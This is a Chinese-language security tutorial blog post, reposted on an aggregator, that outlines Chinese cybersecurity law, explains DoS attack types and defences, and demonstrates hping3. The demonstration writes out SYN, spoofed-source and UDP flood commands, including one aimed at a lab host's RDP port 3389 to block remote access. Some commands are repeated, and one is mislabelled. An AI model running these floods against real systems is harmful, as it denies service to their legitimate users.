1024我来利用DOS攻击你的电脑了?(第十三课)

news2024/10/5 16:32:46

1024我来利用DOS攻击你的电脑了?(第十三课)

本文章设计安全领域的重点问题 学习本文章时 请扎在初学者的角度学习 用于正途

一 国家安全法

1 安全法律法规

《宪法》中的相关规定

案例: 大山破解同事小美私人邮箱密码,读取其往来邮件 邮箱管理员大山根据人事部门要求,下载离职员工小美的企业邮箱邮件

《刑法》中的相关规定

案例1:非法获取计算机信息系统数据、非法控制计算机信息系统、提供非法控制计算机信息系统程序案 12309中国检察网 案例2:百度一员工心生不满“删库”被判刑,法院:构成破坏计算机信息系统罪百度一员工心生不满“删库”被判刑,法院:构成破坏计算机信息系统罪|微盟|百度公司|服务器_网易订阅

《网络安全法》中的相关规定

案例:深圳宝安一企业遭黑客入侵,报案反被行政警告处罚,网警这样说 百度安全验证

2 其他法律法规和部门规章

1)行政法规 《电信条例》 《计算机信息网络国际互联网管理暂行规定》 《计算机信息网络国际联网安全保护管理办法》 《互联网信息服务管理办法》

2)部门规章 《中国互联网域名管理办法》(原信产部) 《互联网IP地址备案管理办法》(原信产部) 《电子认证服务管理办法》(原信产部) 《互联网电子邮件服务管理办法》(原信产部) 《互联网安全保护技术措施规定》(公安部) 《计算机病毒防治管理办法》(公安部) 《信息安全等级保护管理办法》(公安部) 《计算机信息系统安全保护条例》(公安部) 《计算机信息系统国际互联网保密管理规定》(保密局)

3  网络安全法

1)网络安全法的五个方面(七章七十九条)

-网络安全支持与促进

-网络运行安全 -关键信息基础设施的运行安全 -网络信息安全 -检测预警与应急处置

[http://www.npc.gov.cn/npc/c30834/201611/270b43e8b35e4f7ea98502b6f0e26f8a.shtml

2)等级保护制度

网络安全法第二十一条 :国家实行网络安全等级保护制度

安全保护义务包括: 制定内部安全管理制度和操作规程,确定网络安全负责人,落实网络安全保护责任; 采取防护计算机病毒和网络攻击、网络侵入等危害网络安全行为的技术措施; 采取监测、记录网络运行状态、网络安全事件的技术措施,并按照规定留存相关的网络日志不少于六个月; 采取数据分类、重要数据备份和加密等措施; 法律、行政法规规定的其他义务

二 DOS 攻击的流程介绍

1 DOS攻击的定义?

DOS攻击(Denial of Service Attack)指的是一种恶意攻击,攻击者通过占用或者破坏网络资源,使得合法用户无法正常访问服务的行为。攻击者通常会通过向目标主机或网络发送大量的请求或数据包,以使目标主机或网络超负荷或崩溃。DOS攻击是网络攻击中常见的一种攻击方式,也是网络安全领域中重要的研究方向之一。

2 DOS 如何攻击的?

  1. SYN Flood攻击:攻击者向目标系统发送大量的TCP连接请求,而在目标系统返回确认应答前,攻击者却不继续发送确认信息,从而使得目标系统处于等待状态,耗尽其连接资源,无法为合法用户提供服务。

  2. ICMP攻击:攻击者向目标系统发送大量的ICMP请求,使得目标系统的网络带宽资源被极度耗尽,从而使得合法用户无法正常访问。

  3. UDP Flood攻击:攻击者向目标系统发送大量无效的UDP包,从而导致目标系统的网络带宽资源被耗尽,无法为合法用户提供服务。

  4. HTTP Flood攻击:攻击者利用客户端程序和蠕虫病毒控制的计算机,不停地向目标系统的WEB服务器发送合法的HTTP请求,消耗其网络带宽资源和CPU负荷,使得目标系统无法处理正常的请求。

3 Dos改如何去防御。

DDoS(分布式拒绝服务攻击)是一种更高级的攻击方式,通过利用多个分布式计算机的联合攻击,更加难以预测和应对。因此,许多企业和组织都选择使用第三方服务提供商的DDoS保护服务。这些服务提供商将监控网络流量、筛选出可疑数据包,并阻止它们进入被攻击系统。这些服务还可以提供实时报告,以帮助您了解攻击的类型和来源。

限制网络流量

为了防止DoS攻击,可以限制网络流量,阻止流量过载目标服务器。例如,可以使用防火墙、入侵检测系统(IDS)和入侵防御系统(IPS)来过滤出来自已知攻击源的数据包,或者限制网站访问流量,以减轻攻击的影响。

加强授权访问和认证控制

攻击者可能会利用开放的网络服务漏洞,通过大量的非授权访问请求来进行DoS攻击。因此,加强授权访问和认证控制是一种有效的防御DoS攻击的方法。例如,可以通过VPN、IP白名单或基于角色的访问控制来限制对特定资源的访问。

加强系统容错性和恢复能力

在遭受DoS攻击时,系统容错性和恢复能力非常重要。在设计和实施网络架构时,应该考虑到容错性和恢复能力,例如使用负载均衡器、故障切换和备份系统等。

4 DOS 案例演示  让所有的主机不能远程

1  开始DOS 之前的测试

2 开始攻击 利用hping3 工具

*****以下是hping3工具的使用详细介绍,需要注意的是,在使用hping3时,必须遵守国家法律法规,不要用于非法活动。

hping3是一款流量发生工具,适用于网络安全测试、网络管理和网络开发等领域。它可以用来检查网络设备的可用性、测试网络服务器的抗压性功能,以及执行各种类型的网络攻击。

下面是hping3工具的使用详细介绍:

1.基本使用

通过hping3可以发送各种类型的流量包,如TCP、UDP、ICMP等。以下是一些基本的示例命令:

  • TCP SYN扫描

hping3 -S IP地址

  • Ping扫描

hping3 -1 IP地址

  • UDP扫描

hping3 -2 IP地址 -p 端口号

  • TCP ACK扫描

hping3 -A IP地址 -p 端口号

2.高级使用

除了基本的功能外,hping3还提供了一些高级的功能:

  • 发送任意数据

hping3 -d 数据长度 IP地址 -p 端口号 -S

  • 发送ICMP数据

hping3 -1 IP地址 --icmp-code 8

  • 发送TCP数据包

hping3 -S IP地址 -p 端口号 -d 数据长度 --ack

3.攻击功能

hping3还提供了一些攻击功能,例如DOS攻击和网络欺骗:

  • DOS攻击

hping3 --flood IP地址

  • 网络欺骗

hping3 --spoof IP地址 -a 目标IP地址 -p 目标端口号 --icmp

hping3是一款高级的命令行网络扫描器和数据包生成器。它可用于对网络设备进行测试,探测端口和服务以及在网络上模拟攻击。以下是hping3工具的使用详细介绍和具体案例:

1.基本用法

使用hping3时,可以为其设置各种选项和参数,以实现不同的目标。以下是一些常见的选项:

-i :设置发送数据包的时间间隔。

-c :设置要发送的数据包数量。

-p :指定目标端口号。

-S :设置TCP SYN标志。

-w :设置超时时间。

示例:发送10个SYN包到目标主机的端口80上。

hping3 -c 10 -S -p 80 target_ip
  1. 测试网络带宽

可以使用hping3测试网络带宽,这对诊断网络瓶颈非常有用。以下是一个示例,该示例发送大量的UDP数据包到目标主机地址上:

hping3 -S -P -U --flood -V -d 1200 -w 64 -p 8000 target_ip

  1. 模拟DDoS攻击

使用hping3可以模拟DDoS攻击,验证网络设备的稳定性和可靠性。以下是一个示例,该示例向目标主机发送大量的SYN包:

hping3 -S -a source_ip -p 80 --flood target_ip
  1. 探测网络主机信息

使用hping3可以探测网络主机的IP地址、开放的端口和服务。以下是一个示例,该示例扫描目标主机的80端口:

hping3 -S -p 80 target_ip
  1. 使用TCP Ping进行探测

使用TCP Ping可以轻松探测网络主机上的TCP端口是否可用。以下是一个示例,该示例检查目标主机的80端口是否开放:

hping3 -c 1 -S -p 80 target_ip

hping3  192.168.10.142 --syn --flood -p 3389

3 3389

3389 是远程桌面协议(RDP)的默认端口号。RDP是一种远程访问协议,可让用户通过网络远程控制远程计算机。当用户使用远程桌面连接软件连接到目标计算机时,连接将使用3389端口进行通信。

4  Hping3 功能详细介绍

hping3是一款非常强大的网络探测和攻击工具,它可以用于探测远程主机的IP地址,扫描开放的端口,测试网络的性能和安全性,以及进行各种类型的攻击。它支持TCP、UDP、ICMP等多种协议,并且具有高度的灵活性和可自定义性。不过,需要注意的是,hping3的使用需要谨慎,因为它也可以被黑客用于进行网络攻击和侵入。

──(root㉿kali)-[~]
└─# hping3 -help
usage: hping3 host [options]
  -h  --help      show this help
  -v  --version   show version
  -c  --count     packet count
  -i  --interval  wait (uX for X microseconds, for example -i u1000)
      --fast      alias for -i u10000 (10 packets for second)
      --faster    alias for -i u1000 (100 packets for second)
      --flood      sent packets as fast as possible. Don't show replies.
  -n  --numeric   numeric output
  -q  --quiet     quiet
  -I  --interface interface name (otherwise default routing interface)
  -V  --verbose   verbose mode
  -D  --debug     debugging info
  -z  --bind      bind ctrl+z to ttl           (default to dst port)
  -Z  --unbind    unbind ctrl+z
      --beep      beep for every matching packet received
Mode
  default mode     TCP
  -0  --rawip      RAW IP mode
  -1  --icmp       ICMP mode
  -2  --udp        UDP mode
  -8  --scan       SCAN mode.
                   Example: hping --scan 1-30,70-90 -S www.target.host
  -9  --listen     listen mode
IP
  -a  --spoof      spoof source address
  --rand-dest      random destionation address mode. see the man.
  --rand-source    random source address mode. see the man.
  -t  --ttl        ttl (default 64)
  -N  --id         id (default random)
  -W  --winid      use win* id byte ordering
  -r  --rel        relativize id field          (to estimate host traffic)
  -f  --frag       split packets in more frag.  (may pass weak acl)
  -x  --morefrag   set more fragments flag
  -y  --dontfrag   set don't fragment flag
  -g  --fragoff    set the fragment offset
  -m  --mtu        set virtual mtu, implies --frag if packet size > mtu
  -o  --tos        type of service (default 0x00), try --tos help
  -G  --rroute     includes RECORD_ROUTE option and display the route buffer
  --lsrr           loose source routing and record route
  --ssrr           strict source routing and record route
  -H  --ipproto    set the IP protocol field, only in RAW IP mode
ICMP
  -C  --icmptype   icmp type (default echo request)
  -K  --icmpcode   icmp code (default 0)
      --force-icmp send all icmp types (default send only supported types)
      --icmp-gw    set gateway address for ICMP redirect (default 0.0.0.0)
      --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)
      --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)
      --icmp-help  display help for others icmp options
UDP/TCP
  -s  --baseport   base source port             (default random)
  -p  --destport   [+][+]<port> destination port(default 0) ctrl+z inc/dec
  -k  --keep       keep still source port
  -w  --win        winsize (default 64)
  -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)
  -Q  --seqnum     shows only tcp sequence number
  -b  --badcksum   (try to) send packets with a bad IP checksum
                   many systems will fix the IP checksum sending the packet
                   so you'll get bad UDP/TCP checksum instead.
  -M  --setseq     set TCP sequence number
  -L  --setack     set TCP ack
  -F  --fin        set FIN flag
  -S  --syn        set SYN flag
  -R  --rst        set RST flag
  -P  --push       set PUSH flag
  -A  --ack        set ACK flag
  -U  --urg        set URG flag
  -X  --xmas       set X unused flag (0x40)
  -Y  --ymas       set Y unused flag (0x80)
  --tcpexitcode    use last tcp->th_flags as exit code
  --tcp-mss        enable the TCP MSS option with the given value
  --tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime
Common
  -d  --data       data size                    (default is 0)
  -E  --file       data from file
  -e  --sign       add 'signature'
  -j  --dump       dump packets in hex
  -J  --print      dump printable characters
  -B  --safe       enable 'safe' protocol
  -u  --end        tell you when --file reached EOF and prevent rewind
  -T  --traceroute traceroute mode              (implies --bind and --ttl 1)
  --tr-stop        Exit when receive the first not ICMP in traceroute mode
  --tr-keep-ttl    Keep the source TTL fixed, useful to monitor just one hop
  --tr-no-rtt       Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
  --apd-send       Send the packet described with APD (see docs/APD.txt)

5  发动攻击

5.1 hping3  192.168.10.142 --syn --flood -p 3389

 无法远程连接

6 hping3 -c 1 -S -p 80 target_ip

7 hping3 -c 1 -S -p 80 target_ip

8 hping3 -S -P -U --flood -V -d 1200 -w 64 -p 8000 target_ip

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1120460.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Go并发编程之四

一、前言 今天我们介绍一下Go并发编程另外一个重要概念【多路复用】&#xff0c;多路复用最开始是在网络通讯领域&#xff08;硬件&#xff09;应用&#xff0c;指的是用同一条线路承载多路信号进行通信的方式&#xff0c;有频分多路复用、时分多路复用等等技术&#xff0c;然…

组合数(递推版)的初始化

初始考虑为将第一列数和斜对角线上的数进行初始化。 橙色方块由两个绿色方块相加而来&#xff0c;一个为1&#xff0c;一个为0&#xff0c;所以斜对角线都为1&#xff0c;可以通过计算得来&#xff0c;不需要初始化&#xff0c;需要与码蹄集盒子与球 第二类Stirling数&#xf…

【Linux】命令行参数和环境变量

命令行参数 其实main函数是可以传参数的&#xff0c;也叫做命令行参数。我们这里先介绍main函数的前两个参数 argc代表的是指针数组的元素个数&#xff0c;argv是一个指针数组&#xff0c;指针指向字符串。argv不可能为空&#xff0c;argv【0】存储该进程的名字 例如 ls -a -…

【数据结构】830+848真题易错题汇总(10-23)

【数据结构】830848易错题汇总(10-23) 文章目录 【数据结构】830848易错题汇总(10-23)选择题填空题判断题简答题&#xff1a;应用题&#xff1a;算法填空题&#xff1a;算法设计题&#xff1a;(待补) 选择题 1、顺序栈 S 的 Pop(S, e)操作弹出元素 e&#xff0c;则下列(C )是正…

在 Python 中使用 Pillow 进行图像处理【2/4】

第二部分 一、说明 该文是《在 Python 中使用 Pillow 进行图像处理》的第二部分&#xff0c;主要介绍pil库进行一般性处理&#xff1a;如&#xff1a;图像卷积、钝化、锐化、阈值分割。 二、在 Python 中使用 Pillow 进行图像处理 您已经学习了如何裁剪和旋转图像、调整图像大…

Yakit工具篇:专项漏洞检测的配置和使用

简介&#xff08;来自官方文档&#xff09; 专项漏洞检测是针对特定应用程序或系统进行的安全漏洞扫描技术&#xff0c;旨在检测与该应用程序或系统相关的安全漏洞。 Yakit通过对常见的中间件、CMS、框架、组件进行总结、归纳&#xff0c;并针对这些组件对其常见的高危漏洞进…

027-第三代软件开发_ComboBox

第三代软件开发_ComboBox 文章目录 第三代软件开发_ComboBox项目介绍ComboBox实际使用 关键字&#xff1a; Qt、 Qml、 ComboBox、 delegate、 Connections 项目介绍 欢迎来到我们的 QML & C 项目&#xff01;这个项目结合了 QML&#xff08;Qt Meta-Object Language&…

试题一 (软件设计师笔记)(15分)

&#x1f600;前言 现在就是总复习试题一 &#x1f3e0;个人主页&#xff1a;尘觉主页 &#x1f9d1;个人简介&#xff1a;大家好&#xff0c;我是尘觉&#xff0c;希望我的文章可以帮助到大家&#xff0c;您的满意是我的动力&#x1f609; 在csdn获奖荣誉: &#x1f3c6;csd…

记录打包部署Springboot项目到Windows环境

Springboot项目开发完成后要做的工作就是部署了&#xff0c;这里记录下打包部署的过程。这个项目是一个SpringBoot多模块项目&#xff0c;包含了一个父工程&#xff0c;一个子模块和一个工具模块。其中子模块里有启动类&#xff0c;而工具模块没有。因此这三者的pom文件不一样。…

SOME/IP, DDS 还是 MQTT

如今&#xff0c;用户希望将他们的汽车根据个人偏好进行定制&#xff0c;通过添加功能并定期进行更新&#xff0c;就像他们对待移动设备一样。实现这些期望属性的一个构建模块是基于 Internet Protocol&#xff08;IP&#xff09;的通信&#xff1b;IP为新的设计模式打开了大门…

arcgis js api 4.x加载geoserver发布的地方坐标系(自定义坐标系)的wms服务

问题描述&#xff1a;之前研究过arcgis js api 4.x加载arcgis server 发布的地方坐标系的wms服务&#xff0c;后来研究出来能正常加载了&#xff0c;想了解的可以看我之前的博客。但是一直困于加载geoserver发布的地方坐标系的wms服务&#xff0c;一直都是用的WMSLayer这个调用…

1024渗透OpenVas扫描工具使用(第十四课)

1024渗透扫描工具使用(第十四课) 一 漏洞披露 1 微软安全更新指南&#xff08;自2017年2月起&#xff0c;替代安全公告&#xff09; 安全公告都有一个惟一的编号 其命名规则是&#xff1a;MS年份-补丁序号 或 CVE-年份-补丁序号 比如MS17-010就表示2017年发布的编号为010的安…

自然语言处理---Transformer构建语言模型

语言模型概述 以一个符合语言规律的序列为输入&#xff0c;模型将利用序列间关系等特征&#xff0c;输出一个在所有词汇上的概率分布&#xff0c;这样的模型称为语言模型。 # 语言模型的训练语料一般来自于文章&#xff0c;对应的源文本和目标文本形如: src1 "I can do&…

【剑指Offer】34.二叉树中和为某一值的路径(二)

题目 输入一颗二叉树的根节点root和一个整数expectNumber&#xff0c;找出二叉树中结点值的和为expectNumber的所有路径。 1.该题路径定义为从树的根结点开始往下一直到叶子结点所经过的结点 2.叶子节点是指没有子节点的节点 3.路径只能从父节点到子节点&#xff0c;不能从…

运维:mysql常用的服务器状态命令

目录 1、查询当前服务器运行的进程 2、查询最大链接数 3、查询当前链接数 4、展示当前正在执行的sql语句 5、查询当前MySQL当中记录的慢查询条数 6、展示Mysql服务器从启动到现在持续运行的时间 7、查询数据库存储占用情况 8、查询服务器启动以来的执行查询的总次数 9…

算法通关村第十关黄金挑战——归并排序详解

大家好&#xff0c;我是怒码少年小码。 归并排序 就是将一个大的序列分为多个小的序列&#xff0c;对小的序列排序&#xff0c;最后利用归并的思想合并序列。归并排序的思想就是分而治之。 分&#xff1a;将大序列分为很多个小的序列 治&#xff1a;将多个小的序列合并为大序…

用 pytorch 训练端对端验证码识别神经网络并进行 C++ 移植

文章目录 前言安装安装 pytorch安装 libtorch安装 opencv&#xff08;C&#xff09; 准备数据集获取训练数据下载标定 编码预分析 数据集封装格式 神经网络搭建神经网络训练神经网络测试神经网络预测C 移植模型转换通过跟踪转换为 Torch Script通过注解转换为 Torch Script 编写…

解决 Element-ui中 表格(Table)使用 v-if 条件控制列显隐时数据展示错乱的问题

本文 Element-ui 版本 2.x 问题 在 el-table-column 上需根据不同 v-if 条件来控制列显隐时&#xff0c;就会出现列数据展示错乱的情况&#xff08;要么 A 列的数据显示在 B 列上&#xff0c;或者后端返回有数据的但是显示的为空&#xff09;&#xff0c;如下所示。 <tem…

Python教程(15)——Python流程控制语句详解

目录 if语句else if语句for循环遍历类型range关键字 while循环break语句continue语句 Python流程控制是Python编程中非常重要的一部分&#xff0c;它用于控制程序的执行流程。Python提供了多种流程控制语句&#xff0c;包括if语句、while循环、for循环、break和continue语句等。…

[翻译]理解Postgres的IOPS:为什么数据即使都在内存,IOPS也非常重要

理解Postgres的IOPS&#xff1a;为什么数据即使都在内存&#xff0c;IOPS也非常重要 磁盘IOPS&#xff08;每秒输入/输出操作数&#xff09;是衡量磁盘系统性能的关键指标。代表每秒可以执行的读写操作数量。对于严重依赖于磁盘访问的PG来说&#xff0c;了解和优化磁盘IOPS对实…